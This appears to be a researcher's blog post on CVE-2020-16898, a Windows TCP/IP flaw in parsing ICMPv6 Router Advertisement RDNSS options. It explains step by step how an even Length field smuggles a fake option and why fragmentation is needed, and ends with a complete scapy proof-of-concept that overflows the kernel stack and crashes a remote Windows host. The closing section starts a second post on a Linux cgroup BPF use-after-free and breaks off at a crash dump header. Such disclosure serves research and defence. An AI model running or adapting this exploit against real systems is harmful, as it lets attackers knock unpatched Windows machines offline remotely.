To exploit this vulnerability, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.
The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets.”

This vulnerability is so important that I decided to write a Proof-of-Concept for it. During my work there weren’t any public exploits for it. I spent a significant amount of time analyzing all the caveats necessary for triggering the bug. Even now, the available information doesn’t provide sufficient details for triggering it. That’s why I decided to summarize my experience. First, a short summary:

  • This bug can ONLY be exploited when the source address is a link-local IPv6 address. This requirement limits the potential targets!
  • The entire payload must be a valid IPv6 packet. If you screw up the headers too much, your packet will be rejected before triggering the bug.
  • During the validation of the packet size, every “Length” defined in the optional headers must match the packet size.
  • This vulnerability allows you to smuggle an extra “header”. This header is not validated and includes a “Length” field. After the bug is triggered, this field will be inspected against the packet size anyway.
  • The Windows NDIS API which can trigger the bug has a very annoying optimization (from the exploitation perspective). To bypass it, you need to use fragmentation! Otherwise, you can trigger the bug, but it won’t result in memory corruption!

Collecting information about the vulnerability

At first, I wanted to learn more about the bug. The only extra information which I could find was in the write-ups describing the detection logic for it. It is quite a funny twist of fate that the information on how to protect against an attack was helpful in exploitation 🙂 Write-ups:

The most crucial is the following information:

“While we ignore all Options that aren’t RDNSS, for Option Type = 25 (RDNSS), we check to see if the Length (second byte in the Option) is an even number. If it is, we flag it. If not, we continue. Since the Length is counted in increments of 8 bytes, we multiply the Length by 8 and jump ahead that many bytes to get to the start of the next Option (subtracting 1 to account for the length byte we’ve already consumed).”

OK, so what have we learned from it? Quite a lot:

  • We need to send an RDNSS packet
  • The problem is an even number in the Length field
  • The function responsible for parsing the packet will reference the last 8 bytes of the RDNSS payload as the next header

That’s more than enough to start poking around. First, we need to generate a valid RDNSS packet.

RDNSS

The Recursive DNS Server Option (RDNSS) is one of the sub-options of the Router Advertisement (RA) message. RAs can be sent via ICMPv6. Let’s look at the documentation for RDNSS (https://tools.ietf.org/html/rfc5006):

5.1. Recursive DNS Server Option
The RDNSS option contains one or more IPv6 addresses of recursive DNS
servers. All of the addresses share the same lifetime value. If it
is desirable to have different lifetime values, multiple RDNSS
options can be used. Figure 1 shows the format of the RDNSS option.

  0                   1                   2                   3
  0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |     Type      |     Length    |           Reserved            |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                           Lifetime                            |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
 |                                                               |
 :            Addresses of IPv6 Recursive DNS Servers            :
 |                                                               |
 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Description of the Length field:

 Length        8-bit unsigned integer.  The length of the option
               (including the Type and Length fields) is in units of
               8 octets.  The minimum value is 3 if one IPv6 address
               is contained in the option.  Every additional RDNSS
               address increases the length by 2.  The Length field
               is used by the receiver to determine the number of
               IPv6 addresses in the option.

This essentially means that Length must always be an odd number as long as there is any payload.
OK, let’s create an RDNSS packet. How to do it? I’m using scapy since it’s the easiest and fastest way to create any packet we want. It is very simple:

from scapy.all import *

v6_dst = "<destination address>"
v6_src = "<source address>"

# A valid RDNSS option: len = 7 (odd) => 3 IPv6 addresses
c = ICMPv6NDOptRDNSS()
c.len = 7
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

When we set up a kernel debugger and analyze the public symbols from the tcpip.sys driver, we can find interesting function names:

tcpip!Ipv6pHandleRouterAdvertisement
tcpip!Ipv6pUpdateRDNSS

Let’s try to set breakpoints there and see if our packet arrives:

0: kd> bp tcpip!Ipv6pUpdateRDNSS
0: kd> bp tcpip!Ipv6pHandleRouterAdvertisement
0: kd> g
Breakpoint 0 hit
tcpip!Ipv6pHandleRouterAdvertisement:
fffff804`483ba398 48895c2408      mov     qword ptr [rsp+8],rbx
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a66ad8 fffff804`483c04e0 tcpip!Ipv6pHandleRouterAdvertisement
01 fffff804`48a66ae0 fffff804`4839487a tcpip!Icmpv6ReceiveDatagrams+0x340
02 fffff804`48a66cb0 fffff804`483cb998 tcpip!IppProcessDeliverList+0x30a
03 fffff804`48a66da0 fffff804`483906df tcpip!IppReceiveHeaderBatch+0x228
04 fffff804`48a66ea0 fffff804`4839037c tcpip!IppFlcReceivePacketsCore+0x34f
05 fffff804`48a66fb0 fffff804`483b24ce tcpip!IpFlcReceivePackets+0xc
06 fffff804`48a66fe0 fffff804`483b19a2 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x25e
07 fffff804`48a670d0 fffff804`45a4f698 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0xd2
08 fffff804`48a67200 fffff804`45a4f60d nt!KeExpandKernelStackAndCalloutInternal+0x78
09 fffff804`48a67270 fffff804`483a1741 nt!KeExpandKernelStackAndCalloutEx+0x1d
0a fffff804`48a672b0 fffff804`4820b530 tcpip!FlReceiveNetBufferListChain+0x311
0b fffff804`48a67550 ffffcb82`f9dfb370 0xfffff804`4820b530
0c fffff804`48a67558 fffff804`48a676b0 0xffffcb82`f9dfb370
0d fffff804`48a67560 00000000`00000000 0xfffff804`48a676b0
0: kd> g
...

Hm… OK. We never hit Ipv6pUpdateRDNSS, but we did hit Ipv6pHandleRouterAdvertisement. This means that our packet is fine. Why the hell did we not end up in Ipv6pUpdateRDNSS?

Problem 1 – IPv6 link-local address

We are failing validation of the address here:

fffff804`483ba4b4 458a02          mov     r8b,byte ptr [r10]
fffff804`483ba4b7 8d5101          lea     edx,[rcx+1]
fffff804`483ba4ba 8d5902          lea     ebx,[rcx+2]
fffff804`483ba4bd 41b7c0          mov     r15b,0C0h
fffff804`483ba4c0 4180f8ff        cmp     r8b,0FFh
fffff804`483ba4c4 0f84a8820b00    je      tcpip!Ipv6pHandleRouterAdvertisement+0xb83da (fffff804`48472772)
fffff804`483ba4ca 33c0            xor     eax,eax
fffff804`483ba4cc 498bca          mov     rcx,r10
fffff804`483ba4cf 48898570010000  mov     qword ptr [rbp+170h],rax
fffff804`483ba4d6 48898578010000  mov     qword ptr [rbp+178h],rax
fffff804`483ba4dd 4484d2          test    dl,r10b
fffff804`483ba4e0 0f8599820b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb83e7 (fffff804`4847277f)
fffff804`483ba4e6 4180f8fe        cmp     r8b,0FEh
fffff804`483ba4ea 0f85ab820b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb8403 (fffff804`4847279b) [br=0]

r10 points to the beginning of the address:

0: kd> dq @r10
ffffcb82`f9a5b03a  000052b0`80db12fd e5f5087c`645d7b5d
ffffcb82`f9a5b04a  000052b0`80db12fd b7220a02`ea3b3a4d
ffffcb82`f9a5b05a  08070800`e56c0086 00000000`00000000
ffffcb82`f9a5b06a  ffffffff`00000719 aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b07a  aaaaaaaa`aaaaaaaa aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b08a  aaaaaaaa`aaaaaaaa aaaaaaaa`aaaaaaaa
ffffcb82`f9a5b09a  aaaaaaaa`aaaaaaaa 63733a6e`12990c28
ffffcb82`f9a5b0aa  70752d73`616d6568 643a6772`6f2d706e

These bytes:

ffffcb82`f9a5b03a  000052b0`80db12fd e5f5087c`645d7b5d

match the IPv6 address which I used as the source address:

v6_src = "fd12:db80:b052:0:5d7b:5d64:7c08:f5e5"

It is compared with the byte 0xFE. From the IPv6 addressing documentation we can learn that:

fe80::/10 — Addresses in the link-local prefix are only valid and unique on a single link (comparable to the auto-configuration addresses 169.254.0.0/16 of IPv4).

OK, so it is looking for the link-local prefix. Another interesting check happens when we fail the previous one:

fffff804`4847279b e8f497f8ff      call    tcpip!IN6_IS_ADDR_LOOPBACK (fffff804`483fbf94)
fffff804`484727a0 84c0            test    al,al
fffff804`484727a2 0f85567df4ff    jne     tcpip!Ipv6pHandleRouterAdvertisement+0x166 (fffff804`483ba4fe)
fffff804`484727a8 4180f8fe        cmp     r8b,0FEh
fffff804`484727ac 7515            jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb842b (fffff804`484727c3)

It is checking whether we are coming from loopback, and next we are validated again for being link-local. I’ve modified the packet to use a link-local source address and…

Breakpoint 1 hit
tcpip!Ipv6pUpdateRDNSS:
fffff804`4852a534 4055            push    rbp
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a66728 fffff804`48472cbf tcpip!Ipv6pUpdateRDNSS
01 fffff804`48a66730 fffff804`483c04e0 tcpip!Ipv6pHandleRouterAdvertisement+0xb8927
02 fffff804`48a66ae0 fffff804`4839487a tcpip!Icmpv6ReceiveDatagrams+0x340
03 fffff804`48a66cb0 fffff804`483cb998 tcpip!IppProcessDeliverList+0x30a
04 fffff804`48a66da0 fffff804`483906df tcpip!IppReceiveHeaderBatch+0x228
05 fffff804`48a66ea0 fffff804`4839037c tcpip!IppFlcReceivePacketsCore+0x34f
06 fffff804`48a66fb0 fffff804`483b24ce tcpip!IpFlcReceivePackets+0xc
07 fffff804`48a66fe0 fffff804`483b19a2 tcpip!FlpReceiveNonPreValidatedNetBufferListChain+0x25e
08 fffff804`48a670d0 fffff804`45a4f698 tcpip!FlReceiveNetBufferListChainCalloutRoutine+0xd2
09 fffff804`48a67200 fffff804`45a4f60d nt!KeExpandKernelStackAndCalloutInternal+0x78
0a fffff804`48a67270 fffff804`483a1741 nt!KeExpandKernelStackAndCalloutEx+0x1d
0b fffff804`48a672b0 fffff804`4820b530 tcpip!FlReceiveNetBufferListChain+0x311
0c fffff804`48a67550 ffffcb82`f9dfb370 0xfffff804`4820b530
0d fffff804`48a67558 fffff804`48a676b0 0xffffcb82`f9dfb370
0e fffff804`48a67560 00000000`00000000 0xfffff804`48a676b0

Works! OK, let’s move on to the bug-triggering phase.

Triggering the bug

What we know from the detection logic write-up:

“we check to see if the Length (second byte in the Option) is an even number”

Let’s test it:

from scapy.all import *

v6_dst = "<destination address>"
v6_src = "<link-local source address>"

# The same packet as before, but with an even Length
c = ICMPv6NDOptRDNSS()
c.len = 6
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

and we end up executing this code:

fffff804`4852a5b3 4c8b15be8b0700  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)]
fffff804`4852a5ba e8113bceff      call    fffff804`4820e0d0
fffff804`4852a5bf 418bd7          mov     edx,r15d
fffff804`4852a5c2 498bce          mov     rcx,r14
fffff804`4852a5c5 488bd8          mov     rbx,rax
fffff804`4852a5c8 e8a39de5ff      call    tcpip!NetioAdvanceNetBuffer (fffff804`48384370)
fffff804`4852a5cd 0fb64301        movzx   eax,byte ptr [rbx+1]
fffff804`4852a5d1 8d4e01          lea     ecx,[rsi+1]
fffff804`4852a5d4 2bc6            sub     eax,esi
fffff804`4852a5d6 4183cfff        or      r15d,0FFFFFFFFh
fffff804`4852a5da 99              cdq
fffff804`4852a5db f7f9            idiv    eax,ecx
fffff804`4852a5dd 8b5304          mov     edx,dword ptr [rbx+4]
fffff804`4852a5e0 8945b7          mov     dword ptr [rbp-49h],eax
fffff804`4852a5e3 8bf0            mov     esi,eax
fffff804`4852a5e5 413bd7          cmp     edx,r15d
fffff804`4852a5e8 7412            je      tcpip!Ipv6pUpdateRDNSS+0xc8 (fffff804`4852a5fc)

Essentially, it subtracts 1 from the Length field and the result is divided by 2. This follows the documentation logic and can be summarized as:

tmp = (Length - 1) / 2

This logic generates the same result for odd and even numbers:

(8 – 1) / 2 => 3
(7 – 1) / 2 => 3

There is nothing wrong with that by itself. However, this also “defines” how long the option is. Since IPv6 addresses are 16 bytes long, by providing an even number, the last 8 bytes of the payload will be used as the beginning of the next header. We can see that in Wireshark as well:

(Wireshark screenshot)
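To make the off-by-8 concrete, here is a tiny illustration in Python (my own sketch, not the driver’s code) of how an even Length desynchronizes the parser:

def next_option_offset(length_field):
    return length_field * 8              # options are counted in 8-octet units

def rdnss_bytes_parsed(length_field):
    addresses = (length_field - 1) // 2  # the (Length - 1) / 2 logic above
    return 8 + 16 * addresses            # option header + 16 bytes per address

# Length = 7 (odd): 3 addresses, 8 + 48 = 56 bytes parsed, next option
# expected at 7 * 8 = 56 -- everything lines up.
# Length = 6 (even): the packet still carries 3 addresses (56 bytes on the
# wire), but the next option is expected at 6 * 8 = 48, i.e. 8 bytes inside
# the last address -- those attacker-controlled bytes are treated as a
# smuggled option header (Type, Length, ...).
print(next_option_offset(6), rdnss_bytes_parsed(6))   # 48 40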

That’s pretty interesting. However, what to do with that? What next header should we fake? Why does this matter at all? Well… it took me some time to figure this out. To be honest, I wrote a simple fuzzer to find it out 🙂

Hunting for the correct header(s) (Problem 2)

If we look in the documentation at the available headers / options, we don’t really know which one to use (https://www.iana.org/assignments/icmpv6-parameters/icmpv6-parameters.xml).

What we do know is that ICMPv6 messages have the following general format:

       0                   1                   2                   3
       0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |     Type      |     Code      |          Checksum             |
      +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
      |                                                               |
      +                         Message Body                          +
      |                                                               |

The first byte encodes the “type” of the packet. I made a test and generated the next header to be exactly the same as the “buggy” RDNSS one. I kept hitting the breakpoint for tcpip!Ipv6pUpdateRDNSS, while tcpip!Ipv6pHandleRouterAdvertisement was hit only once. I fired up IDA Pro and started to analyze what’s going on and what logic is being executed. After some reverse engineering I realized that there are 2 loops in the code:

  1. The first loop goes through all the headers and does some basic validation (size of the Length field, etc.)
  2. The second loop doesn’t do any more validation but parses the packet.

As long as there are more “optional headers” in the buffer, we stay in the loop. That’s a very good primitive! Anyway, I still didn’t know which headers should be used, so to find out I brute-forced all the “optional header” types in the triggered bug and found that the second loop cares only about:

  • Type 3 (Prefix Information)
  • Type 24 (Route Information)
  • Type 25 (RDNSS)
  • Type 31 (DNS Search List Option)

I’ve analyzed the Type 24 logic since it is much “smaller / shorter” than Type 3.
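For reference, here is a minimal sketch of such a brute-force (my reconstruction under assumptions – the original fuzzer isn’t published; which types reach the second loop can be observed with the breakpoints set earlier):

from scapy.all import *
import socket

v6_dst = "<destination address>"
v6_src = "<link-local source address>"

# My reconstruction, not the original fuzzer: embed a candidate option type
# in the last 8 bytes of the final RDNSS address and observe which types
# are processed by the second parsing loop.
for opt_type in range(256):
    fake_hdr = bytes([opt_type, 0x01]) + b"\xAA" * 6   # Type, Length, filler
    last_addr = socket.inet_ntop(socket.AF_INET6, b"\xAA" * 8 + fake_hdr)
    c = ICMPv6NDOptRDNSS(len=6, dns=["aaaa:aaaa:aaaa:aaaa:aaaa:aaaa:aaaa:aaaa"] * 2 + [last_addr])
    send(IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c)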

Stack overflow

OK. Let’s try to generate the malicious RDNSS packet “faking” a Route Information option as the next one:

from scapy.all import *

v6_dst = "<destination address>"
v6_src = "<link-local source address>"

# len = 6 (even) -- the last 8 bytes of the final address form the fake
# next option header
c = ICMPv6NDOptRDNSS()
c.len = 6
c.dns = [ "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA", "AAAA:AAAA:AAAA:AAAA:03AA:AAAA:AAAA:AAAA" ]

pkt = IPv6(dst=v6_dst, src=v6_src, hlim=255) / ICMPv6ND_RA() / c
send(pkt)

This never hits the tcpip!Ipv6pUpdateRDNSS function.

Problem 3 – size of the packet

After some debugging I realized that we are failing the following check:

fffff804`483ba766 418b4618        mov     eax,dword ptr [r14+18h]
fffff804`483ba76a 413bc7          cmp     eax,r15d
fffff804`483ba76d 0f85d0810b00    jne     tcpip!Ipv6pHandleRouterAdvertisement+0xb85ab (fffff804`48472943)

where eax is the size of the packet and r15 keeps the count of how much data was consumed. In this specific case we have:

rax = 0x48
r15 = 0x40

This is exactly an 8-byte difference, because we used an even number. To bypass it, I placed another header just after the last one. However, I was still hitting the same problem 🙁 It took me some time to figure out how to play with the packet layout to bypass it, but I finally managed to do so.

Problem 4 – size again!

Finally, I found the correct packet layout and should have ended up in the code responsible for handling the Route Information header. However, I did not 🙂 Here is why. After returning from the RDNSS handler I ended up here:

fffff804`48472cba e875780b00      call    tcpip!Ipv6pUpdateRDNSS (fffff804`4852a534)
fffff804`48472cbf 440fb77c2462    movzx   r15d,word ptr [rsp+62h]
fffff804`48472cc5 e9c980f4ff      jmp     tcpip!Ipv6pHandleRouterAdvertisement+0x9fb (fffff804`483bad93)
...
fffff804`483bad15 4c8b155c841e00  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] ds:002b:fffff804`485a3178=fffff8044820e0d0
fffff804`483bad1c e8af33e5ff      call    fffff804`4820e0d0
...
fffff804`483bad15 4c8b155c841e00  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)]
fffff804`483bad1c e8af33e5ff      call    fffff804`4820e0d0
fffff804`483bad21 0fb64801        movzx   ecx,byte ptr [rax+1]
fffff804`483bad25 66c1e103        shl     cx,3
fffff804`483bad29 66894c2462      mov     word ptr [rsp+62h],cx
fffff804`483bad2e 6685c9          test    cx,cx
fffff804`483bad31 0f8485060000    je      tcpip!Ipv6pHandleRouterAdvertisement+0x1024 (fffff804`483bb3bc)
fffff804`483bad37 0fb7c9          movzx   ecx,cx
fffff804`483bad3a 413b4e18        cmp     ecx,dword ptr [r14+18h] ds:002b:ffffcb82`fcbed1c8=000000b8
fffff804`483bad3e 0f8778060000    ja      tcpip!Ipv6pHandleRouterAdvertisement+0x1024 (fffff804`483bb3bc)

ecx keeps the “Length” of the “fake header”, while [r14+18h] points to the size of the data left in the packet. I set Length to the max (0xFF), which is multiplied by 8 (2040 == 0x7f8). However, there are only 0xb8 bytes left. So, I failed another size validation!

To fix it, I decreased the size of the “fake header” and at the same time attached more data to the packet. That worked!
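In numbers (an illustration only – the padded size is a made-up value):

fake_length = 0xFF
print(hex(fake_length * 8))  # 0x7f8 (2040) bytes requested by the parser...
bytes_left = 0xB8            # ...but only 184 bytes remain -> rejected

# The fix: shrink the fake Length and/or pad the packet so that
# fake_length * 8 <= bytes_left holds.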

Problem 5 – NdisGetDataBuffer() and fragmentation

I had finally found all the puzzle pieces needed to trigger the bug. Or so I thought… I ended up executing the following code, responsible for handling the Route Information message:

fffff804`48472cd9 33c0            xor     eax,eax
fffff804`48472cdb 44897c2420      mov     dword ptr [rsp+20h],r15d
fffff804`48472ce0 440fb77c2462    movzx   r15d,word ptr [rsp+62h]
fffff804`48472ce6 4c8d85b8010000  lea     r8,[rbp+1B8h]
fffff804`48472ced 418bd7          mov     edx,r15d
fffff804`48472cf0 488985b8010000  mov     qword ptr [rbp+1B8h],rax
fffff804`48472cf7 448bcf          mov     r9d,edi
fffff804`48472cfa 488985c0010000  mov     qword ptr [rbp+1C0h],rax
fffff804`48472d01 498bce          mov     rcx,r14
fffff804`48472d04 488985c8010000  mov     qword ptr [rbp+1C8h],rax
fffff804`48472d0b 48898580010000  mov     qword ptr [rbp+180h],rax
fffff804`48472d12 48898588010000  mov     qword ptr [rbp+188h],rax
fffff804`48472d19 4c8b1558041300  mov     r10,qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff804`485a3178)] ds:002b:fffff804`485a3178=fffff8044820e0d0

It tries to get “Length” bytes from the packet to read the entire header. However, Length is fake and not validated; in my test case it had the value 0x100. The destination address points to a buffer on the stack which represents the Route Information header. It is a very small buffer. So, we should have a classic stack overflow, but inside the NdisGetDataBuffer function I ended up executing this:

fffff804`4820e10c 8b7910          mov     edi,dword ptr [rcx+10h]
fffff804`4820e10f 8b4328          mov     eax,dword ptr [rbx+28h]
fffff804`4820e112 8bf2            mov     esi,edx
fffff804`4820e114 488d0c3e        lea     rcx,[rsi+rdi]
fffff804`4820e118 483bc8          cmp     rcx,rax
fffff804`4820e11b 773e            ja      fffff804`4820e15b
fffff804`4820e11d f6430a05        test    byte ptr [rbx+0Ah],5 ds:002b:ffffcb83`086a4c7a=0c
fffff804`4820e121 0f84813f0400    je      fffff804`482520a8
fffff804`4820e127 488b4318        mov     rax,qword ptr [rbx+18h]
fffff804`4820e12b 4885c0          test    rax,rax
fffff804`4820e12e 742b            je      fffff804`4820e15b
fffff804`4820e130 8b4c2470        mov     ecx,dword ptr [rsp+70h]
fffff804`4820e134 8d55ff          lea     edx,[rbp-1]
fffff804`4820e137 4803c7          add     rax,rdi
fffff804`4820e13a 4823d0          and     rdx,rax
fffff804`4820e13d 483bd1          cmp     rdx,rcx
fffff804`4820e140 7519            jne     fffff804`4820e15b
fffff804`4820e142 488b5c2450      mov     rbx,qword ptr [rsp+50h]
fffff804`4820e147 488b6c2458      mov     rbp,qword ptr [rsp+58h]
fffff804`4820e14c 488b742460      mov     rsi,qword ptr [rsp+60h]
fffff804`4820e151 4883c430        add     rsp,30h
fffff804`4820e155 415f            pop     r15
fffff804`4820e157 415e            pop     r14
fffff804`4820e159 5f              pop     rdi
fffff804`4820e15a c3              ret
fffff804`4820e15b 4d85f6          test    r14,r14

In the first ‘cmp‘ instruction, the rcx register holds the requested size. The rax register holds some huge number, and because of that I could never jump out of that logic. As a result of that call, I kept getting an address different from the local stack address, and no overflow happened. I didn’t know what was going on… So, I started to read the documentation of this function, and here is the magic:

“If the requested data in the buffer is contiguous, the return value is a pointer to a location that NDIS provides. If the data is not contiguous, NDIS uses the Storage parameter as follows:
If the Storage parameter is non-NULL, NDIS copies the data to the buffer at Storage. The return value is the pointer passed to the Storage parameter.
If the Storage parameter is NULL, the return value is NULL.”

Here we go… Our big packet is kept somewhere in NDIS, and a pointer to that data is returned instead of it being copied to the local buffer on the stack. I started to Google whether anyone had already hit that problem and… of course, yes 🙂 Looking at this link:

http://newsoft-tech.blogspot.com/2010/02/

we can learn that the simplest solution is to fragment the packet. With scapy that is just a couple of lines (the same construction as in the final PoC below, reusing pkt and the v6_* addresses from the snippets above):
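frag = IPv6(dst=v6_dst, src=v6_src, hlim=255) / IPv6ExtHdrFragment() / pkt
for p in fragment6(frag, 200):   # split into 200-byte fragments
    send(p)

This is exactly what I did and…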

KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x00000139
                       (0x0000000000000002,0xFFFFF80448A662E0,0xFFFFF80448A66238,0x0000000000000000)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff804`45bca210 cc              int     3
0: kd> kpn
 # Child-SP          RetAddr           Call Site
00 fffff804`48a65818 fffff804`45ca9922 nt!DbgBreakPointWithStatus
01 fffff804`48a65820 fffff804`45ca9017 nt!KiBugCheckDebugBreak+0x12
02 fffff804`48a65880 fffff804`45bc24c7 nt!KeBugCheck2+0x947
03 fffff804`48a65f80 fffff804`45bd41e9 nt!KeBugCheckEx+0x107
04 fffff804`48a65fc0 fffff804`45bd4610 nt!KiBugCheckDispatch+0x69
05 fffff804`48a66100 fffff804`45bd29a3 nt!KiFastFailDispatch+0xd0
06 fffff804`48a662e0 fffff804`4844ac25 nt!KiRaiseSecurityCheckFailure+0x323
07 fffff804`48a66478 fffff804`483bb487 tcpip!_report_gsfailure+0x5
08 fffff804`48a66480 aaaaaaaa`aaaaaaaa tcpip!Ipv6pHandleRouterAdvertisement+0x10ef
09 fffff804`48a66830 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0a fffff804`48a66838 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0b fffff804`48a66840 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0c fffff804`48a66848 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0d fffff804`48a66850 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0e fffff804`48a66858 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
0f fffff804`48a66860 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
10 fffff804`48a66868 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
11 fffff804`48a66870 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
12 fffff804`48a66878 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
13 fffff804`48a66880 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
14 fffff804`48a66888 aaaaaaaa`aaaaaaaa 0xaaaaaaaa`aaaaaaaa
...

Here we go! 🙂

Proof-of-Concept

Code can be found here:

http://site.pi3.com.pl/exp/p_CVE-2020-16898.py

#!/usr/bin/env python3
#
# Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
#
# Author: Adam 'pi3' Zabrocki
# http://pi3.com.pl
#

from scapy.all import *

v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"

# 0x18 == 24 == Route Information option type (see the brute-forced list above)
p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA();

e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

# Fragmentation forces NdisGetDataBuffer() to copy the data into the local
# stack buffer (Problem 5).
p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
              IPv6ExtHdrFragment()/pkt

l = fragment6(p_test_frag, 200)

for p in l:
    send(p)

Thanks,
Adam

CVE: 2020-14356 & 2020-25220

By: pi3
11 September 2020 at 05:35

The short story of 1 Linux Kernel Use-After-Free bug and 2 CVEs (CVE-2020-14356 and CVE-2020-25220)

Name:     Linux kernel Cgroup BPF Use-After-Free
Author:   Adam Zabrocki ([email protected])
Date:       May 27, 2020

First things first – short history:

In 2019, Tejun Heo discovered a race problem with the lifetime of cgroup_bpf which could result in a double-free and other memory corruptions. This bug was fixed in kernel 5.3. More information about the problem and the patch can be found here:

https://lore.kernel.org/patchwork/patch/1094080/

Roman Gushchin discovered another problem with the newly fixed code which could lead to a use-after-free vulnerability. His report and fix can be found here:

https://lore.kernel.org/bpf/[email protected]/

During the discussion on the fix, Alexei Starovoitov pointed out that walking through the cgroup hierarchy without holding cgroup_mutex might be dangerous:

https://lore.kernel.org/bpf/20200104003523.rfte5rw6hbnncjes@ast-mbp/

However, Roman and Alexei concluded that it shouldn’t be a problem:

https://lore.kernel.org/bpf/20200106220746.fm3hp3zynaiaqgly@ast-mbp/

Unfortunately, there is another Use-After-Free bug related to the Cgroup BPF release logic.

The “new” bug – details (a lot of details ;-)):

During LKRG development and tests, one of my VMs was generating a kernel crash during the shutdown procedure. This specific machine had the newest kernel at that time (5.7.x), which I compiled with full debug information as well as the SLAB DEBUG feature. When I analyzed the crash, it turned out to have nothing to do with LKRG. Later I confirmed that kernels without LKRG always hit that issue:

      KERNEL: linux-5.7/vmlinux
    DUMPFILE: /var/crash/202006161848/dump.202006161848  [PARTIAL DUMP]
        CPUS: 1
        DATE: Tue Jun 16 18:47:40 2020
      UPTIME: 14:09:24
LOAD AVERAGE: 0.21, 0.37, 0.50
       TASKS: 234
    NODENAME: oi3
     RELEASE: 5.7.0-g4
     VERSION: #28 SMP PREEMPT Fri Jun 12 18:09:14 UTC 2020
     MACHINE: x86_64  (3694 Mhz)
      MEMORY: 8 GB
